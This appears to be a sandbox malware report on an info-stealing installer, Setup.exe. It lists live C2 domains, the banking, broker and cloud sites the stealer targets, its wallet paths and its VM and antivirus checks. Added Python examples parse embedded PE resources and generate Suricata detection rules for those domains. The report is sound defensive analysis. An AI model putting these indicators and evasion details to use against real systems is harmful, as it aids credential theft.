Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.ecosia.org/newtab/
Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49748 version: TLS 1.2

              System Summary

Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Desktop\Setup.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_0075CBD1
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_0074D999
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_00793044
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_0072B659
Source: Setup.exe | Static PE information: invalid certificate
Source: Setup.exe | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Setup.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: Setup.exe, 00000000.00000003.2136633646.0000000002BD8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename shfolder.dll~/ vs Setup.exe
Source: Setup.exe, 00000000.00000000.2028661309.0000000000520000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename shfolder.dll~/ vs Setup.exe
Source: Setup.exe | Binary or memory string: OriginalFilename shfolder.dll~/ vs Setup.exe
Source: Setup.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
Source: C:\Users\user\Desktop\Setup.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Setup.exe, 00000000.00000003.2163337968.000000000361A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163196828.0000000003635000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Setup.exe | ReversingLabs: Detection: 21%
Source: Setup.exe | Virustotal: Detection: 19%
Source: Setup.exe | String found in binary or memory: -Helper process exited with failure code: 0x%x
Source: Setup.exe | String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
Source: Setup.exe | String found in binary or memory: /LoadInf=
Source: Setup.exe | String found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
Source: C:\Users\user\Desktop\Setup.exe | File read: C:\Users\user\Desktop\Setup.exe
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: acgenral.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: samcli.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Setup.exe | Section loaded: profapi.dll
Source: Setup.exe | Static file information: File size 75077735 > 1048576
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_0079EAF4 pushfd ; ret 0_3_0079EC81
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_007A4AE6 pushad ; retf 006Ch 0_3_007A4B1D
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_0079EA2A push edx; ret 0_3_0079EAF1
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_0075CAEB push eax; retf 0_3_0075CB3D
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_0075B5B3 push 00000078h; retf 0_3_0075B5B5
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_0073D97F pushad ; retf 006Ch 0_3_0073D985
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_0073B636 push 0000006Bh; retf 0_3_0073B638
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_007397FA push eax; iretd 0_3_007397FB
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_0073C2EB pushad ; iretd 0_3_0073C2EE
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_007391DA pushfd ; iretd 0_3_007391DB
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_007394B8 push ds; iretd 0_3_007395CB
Source: C:\Users\user\Desktop\Setup.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Setup.exe | Process information set: NOOPENFILEERRORBOX
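The static PE findings above (two RT_RCDATA resources whose contents are themselves a PE32+ x86-64 console executable and a PE32 i386 DLL, alongside an invalid certificate and Delphi/Inno-style installer strings) are worth reproducing outside the sandbox, because an installer carrying a second-stage PE in its resources is the packaging pattern the rest of this report hangs on. The following is an added example, not Joe Sandbox code and not code from the sample: a dependency-free scanner that walks a byte buffer for MZ/PE headers and classifies each hit the way the report's file-type line does. RCDATA_BLOB is constructed from minimal stub headers, not bytes taken from Setup.exe; to check a real sample, pass it the raw resource bytes extracted with a PE parser.

```python
"""Scan a byte buffer for embedded PE images, as a triage script would do for the
RT_RCDATA resources this report lists for Setup.exe.

Added example, not Joe Sandbox or sample code.  RCDATA_BLOB is constructed from
minimal stub headers; it is not data from Setup.exe.
"""
import struct

# IMAGE_FILE_HEADER.Machine values (winnt.h)
MACHINE_I386 = 0x014C
MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000          # IMAGE_FILE_HEADER.Characteristics bit
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
SUBSYSTEM_GUI, SUBSYSTEM_CUI = 2, 3


def parse_pe_at(data: bytes, off: int):
    """Describe the PE image whose DOS header starts at `off`, or return None."""
    if off + 0x40 > len(data) or data[off:off + 2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, off + 0x3C)[0]
    pe = off + e_lfanew
    if e_lfanew > 0x1000 or pe + 24 > len(data) or data[pe:pe + 4] != b"PE\0\0":
        return None
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
    machine, nsect, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24
    if opt_size < 70 or opt + 70 > len(data):
        return None
    magic = struct.unpack_from("<H", data, opt)[0]
    fmt = {PE32_MAGIC: "PE32", PE32PLUS_MAGIC: "PE32+"}.get(magic)
    if fmt is None:
        return None
    # Subsystem sits at optional-header offset 68 in both PE32 and PE32+
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    return {
        "offset": off,
        "format": fmt,
        "arch": {MACHINE_I386: "Intel 80386", MACHINE_AMD64: "x86-64"}.get(machine, hex(machine)),
        "kind": "DLL" if chars & IMAGE_FILE_DLL else "executable",
        "subsystem": {SUBSYSTEM_GUI: "GUI", SUBSYSTEM_CUI: "console"}.get(subsystem, f"subsystem {subsystem}"),
        "sections": nsect,
    }


def find_embedded_pe(data: bytes):
    """Every PE image found in `data`, located by scanning for MZ signatures."""
    found, pos = [], data.find(b"MZ")
    while pos != -1:
        info = parse_pe_at(data, pos)
        if info:
            found.append(info)
        pos = data.find(b"MZ", pos + 1)
    return found


def describe(info) -> str:
    """Render a hit like the report's type column, e.g. 'PE32+ executable (console) x86-64'."""
    return f"{info['format']} {info['kind']} ({info['subsystem']}) {info['arch']}"


def make_stub_pe(machine: int, magic: int, subsystem: int, characteristics: int) -> bytes:
    """Build a minimal, non-runnable PE header blob for testing (constructed data)."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew: PE header right after DOS header
    opt_size = 0xF0 if magic == PE32PLUS_MAGIC else 0xE0
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed stand-in for the two resources named in the report: a PE32+ x86-64
# console executable and a PE32 i386 GUI DLL, separated by filler bytes.
RCDATA_BLOB = (
    b"\x00" * 16
    + make_stub_pe(MACHINE_AMD64, PE32PLUS_MAGIC, SUBSYSTEM_CUI, 0x0022)
    + b"filler" * 8
    + make_stub_pe(MACHINE_I386, PE32_MAGIC, SUBSYSTEM_GUI, 0x2102)
)

if __name__ == "__main__":
    for hit in find_embedded_pe(RCDATA_BLOB):
        print(f"offset {hit['offset']:#x}: {describe(hit)}")
```

The scan is signature-based on purpose: a resource that is a PE is the common case, but droppers also store stages XOR-encoded or at an offset, so a zero-hit result on a large RT_RCDATA blob is a reason to look at entropy, not a reason to stop.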

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Setup.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Setup.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\Setup.exe TID: 1088 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\Setup.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: Setup.exe, 00000000.00000003.2174245134.00000000036B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2161734464.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252229474.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2219391647.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2202431157.0000000000742000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Setup.exe, 00000000.00000003.2174245134.00000000036B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Setup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWPDt%SystemRoot%\system32\mswsock.dll
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\Setup.exe | Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: cloudewahsj.shop
Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: rabidcowse.shop
Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: noisycuttej.shop
Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: tirepublicerj.shop
Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: framekgirus.shop
Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: wholersorie.shop
Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: abruptyopsn.shop
Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: nearycrepso.shop
Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: displayclubby.sbs
Source: C:\Users\user\Desktop\Setup.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Setup.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Setup.exe, Setup.exe, 00000000.00000003.2219391647.0000000000745000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2219391647.000000000079E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\Setup.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
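The URL strings listed under the networking findings and the bare .shop/.sbs domains in the section above are this report's network indicators, but they need sorting before they become detections: the duckduckgo, mozilla, ecosia and google URLs are default browser-profile content the stealer read from disk, and 104.21.64.1 sits in a shared CDN range, so only the C2 domains and the non-CDN peer are worth alerting on. The following is an added example, not Joe Sandbox code: it does that sorting over a constructed excerpt that repeats the report's own lines and emits Suricata DNS and TLS SNI rules. The SID range, rule message and CDN prefix list (a single Cloudflare IPv4 range, assumed; use the published list in practice) are assumptions.

```python
"""Sort the report's string hits into usable network IOCs and emit Suricata rules.

Added example; not Joe Sandbox code.  REPORT_LINES is a constructed excerpt that
repeats values from this report; SID_BASE, the rule message and CDN_RANGES are
assumptions.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Default Firefox/Chrome profile content (bookmarks, search providers).  These show
# up in memory because the stealer reads browser data, not because it contacts them.
BROWSER_PROFILE_HOSTS = {
    "duckduckgo.com", "www.ecosia.org", "www.google.com",
    "www.mozilla.org", "support.mozilla.org",
}
# Assumed: one Cloudflare IPv4 range.  A shared CDN front is not an attributable IOC.
CDN_RANGES = [ipaddress.ip_network("104.16.0.0/12")]
SID_BASE = 9000000  # assumed local SID range

# Constructed excerpt: same values as the report lines above.
REPORT_LINES = """
String found in binary or memory: https://displayclubby.sbs:443/api
String found in binary or memory: https://duckduckgo.com/ac/?q=
String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtds
String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
String found in binary or memory: cloudewahsj.shop
String found in binary or memory: rabidcowse.shop
String found in binary or memory: displayclubby.sbs
HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49721 version: TLS 1.2
HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49748 version: TLS 1.2
""".strip().splitlines()

URL_RE = re.compile(r"String found in binary or memory: (\S+)")
TLS_RE = re.compile(r"HTTPS traffic detected: (\d{1,3}(?:\.\d{1,3}){3}):\d+ -> ")
BARE_DOMAIN_RE = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+$")
NOT_DOMAIN_SUFFIXES = (".json", ".txt", ".dll", ".exe", ".db")  # bare-name heuristic guard


def host_of(value: str):
    """Hostname of a URL or bare domain string; None for anything else."""
    if "://" in value:
        return urlsplit(value).hostname  # drops :443, the path and trailing junk
    if value.lower().endswith(NOT_DOMAIN_SUFFIXES) or not BARE_DOMAIN_RE.match(value):
        return None
    return value


def extract_iocs(lines):
    """Return (domains, ips): hosts minus browser-profile noise, and TLS peer addresses."""
    domains, ips = set(), set()
    for line in lines:
        m = URL_RE.search(line)
        if m:
            host = host_of(m.group(1))
            if host and host not in BROWSER_PROFILE_HOSTS:
                domains.add(host)
        m = TLS_RE.search(line)
        if m:
            ips.add(m.group(1))
    return domains, ips


def usable_ip_iocs(ips):
    """Drop addresses that fall inside shared CDN ranges."""
    return {ip for ip in ips
            if not any(ipaddress.ip_address(ip) in net for net in CDN_RANGES)}


def suricata_rules(domains, msg="LummaC C2 domain"):
    """One dns.query rule and one tls.sni rule per domain, sorted for stable SIDs."""
    rules = []
    for i, d in enumerate(sorted(domains)):
        sid = SID_BASE + 2 * i
        rules.append(f'alert dns $HOME_NET any -> any any (msg:"{msg} {d}"; '
                     f'dns.query; content:"{d}"; nocase; sid:{sid}; rev:1;)')
        rules.append(f'alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"{msg} TLS SNI {d}"; '
                     f'tls.sni; content:"{d}"; nocase; sid:{sid + 1}; rev:1;)')
    return rules


if __name__ == "__main__":
    domains, ips = extract_iocs(REPORT_LINES)
    print("domains:", sorted(domains))
    print("ips:", sorted(usable_ip_iocs(ips)), "dropped as CDN:", sorted(ips - usable_ip_iocs(ips)))
    print("\n".join(suricata_rules(domains)))
```

Matching on dns.query and tls.sni rather than on the resolved address is deliberate: the sample's TLS peers are a CDN edge and a host that any rotation will change, while the domain list is what the malware configuration carries.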

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: Setup.exe PID: 6576, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Setup.exe, 00000000.00000003.2219391647.0000000000766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
Source: Setup.exe, 00000000.00000003.2219391647.0000000000766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
Source: Setup.exe, 00000000.00000003.2219391647.0000000000766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: Setup.exe, 00000000.00000003.2202431157.0000000000745000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty
